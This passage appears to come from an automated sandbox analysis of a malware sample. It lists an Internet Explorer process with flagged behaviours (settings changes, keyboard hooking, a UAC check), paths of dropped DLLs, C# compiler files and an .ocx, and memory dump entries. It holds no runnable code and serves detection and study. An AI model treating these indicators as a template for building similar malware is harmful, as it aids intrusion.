C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1900 CREDAT:82952 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
-
C:\Users\Admin\AppData\Local\Temp\1ACE.bi1
-
C:\Users\Admin\AppData\Local\Temp\1ACE.bi1
-
C:\Users\Admin\AppData\Local\Temp\2uf0qoog\2uf0qoog.dll
-
C:\Users\Admin\AppData\Local\Temp\BN2D25.tmp
-
C:\Users\Admin\AppData\Local\Temp\BN2D25.tmp
-
C:\Users\Admin\AppData\Local\Temp\D3E.bi1
-
C:\Users\Admin\AppData\Local\Temp\D3E.bi1
-
C:\Users\Admin\AppData\Local\Temp\RES9277.tmp
-
C:\Users\Admin\AppData\Local\Temp\RES9313.tmp
-
C:\Users\Admin\AppData\Local\Temp\mswhtq3l\mswhtq3l.dll
-
C:\Users\Admin\Documents\dDdoiBj.ocx
-
\??\c:\Users\Admin\AppData\Local\Temp\2uf0qoog\2uf0qoog.0.cs
-
\??\c:\Users\Admin\AppData\Local\Temp\2uf0qoog\2uf0qoog.cmdline
-
\??\c:\Users\Admin\AppData\Local\Temp\2uf0qoog\CSC34BDC6584AD24D90853E8CE642A0B1BC.TMP
-
\??\c:\Users\Admin\AppData\Local\Temp\mswhtq3l\CSC34B0182361C643F483B2E23F8A9FC592.TMP
-
\??\c:\Users\Admin\AppData\Local\Temp\mswhtq3l\mswhtq3l.0.cs
-
\??\c:\Users\Admin\AppData\Local\Temp\mswhtq3l\mswhtq3l.cmdline
-
\Users\Admin\Documents\dDdoiBj.ocx
-
memory/484-96-0x000000E028F21000-mapping.dmp
-
memory/484-95-0x0000000000000000-mapping.dmp
-
memory/912-86-0x0000000000000000-mapping.dmp
-
memory/1000-100-0x0000000000000000-mapping.dmp
-
memory/1008-5-0x0000000000402960-mapping.dmp
-
memory/1008-4-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/1008-6-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/1160-82-0x0000000000000000-mapping.dmp
-
memory/1204-7-0x0000000000000000-mapping.dmp
-
memory/1492-8-0x000000000BC00000-0x000000000BC12000-memory.dmpFilesize
72KB
-
memory/1492-9-0x000000000BC01067-mapping.dmp
-
memory/1492-10-0x000000000BC00000-0x000000000BC12000-memory.dmpFilesize
72KB
-
memory/1756-14-0x0000000000DE6000-0x0000000000DE7000-memory.dmpFilesize
4KB
-
memory/1756-11-0x0000000000000000-mapping.dmp
-
memory/1756-15-0x00000000011A0000-0x00000000011A1000-memory.dmpFilesize
4KB
-
memory/1964-99-0x0000000000000000-mapping.dmp
-
memory/2144-19-0x0000000004630000-0x0000000004631000-memory.dmpFilesize
4KB
-
memory/2144-24-0x0000000004970000-0x0000000004971000-memory.dmpFilesize
4KB
-
memory/2176-101-0x0000000000000000-mapping.dmp
-
memory/2232-93-0x0000000000000000-mapping.dmp
-
memory/2232-94-0x0000008B47170000-mapping.dmp
-
memory/2240-102-0x0000000000000000-mapping.dmp
-
memory/2332-108-0x0000003F840DE000-mapping.dmp
-
memory/2332-107-0x0000000000000000-mapping.dmp
-
memory/2588-0-0x0000000000000000-mapping.dmp
-
memory/2640-20-0x0000000000000000-mapping.dmp
-
memory/2640-73-0x0000000000000000-mapping.dmp
-
memory/2640-2-0x0000000000000000-mapping.dmp
-
memory/2640-21-0x0000000000000000-mapping.dmp
-
memory/2640-22-0x0000000000000000-mapping.dmp
-
memory/2640-72-0x0000000000000000-mapping.dmp
-
memory/2640-74-0x0000000003470000-0x0000000003471000-memory.dmpFilesize
4KB
-
memory/3184-89-0x0000000000000000-mapping.dmp
-
memory/3376-78-0x0000000000000000-mapping.dmp
-
memory/3448-76-0x0000000000000000-mapping.dmp
-
memory/3464-97-0x0000000000000000-mapping.dmp
-
memory/3480-98-0x0000000000000000-mapping.dmp
-
memory/4004-75-0x0000000000000000-mapping.dmp
-
memory/4024-79-0x0000000000000000-mapping.dmp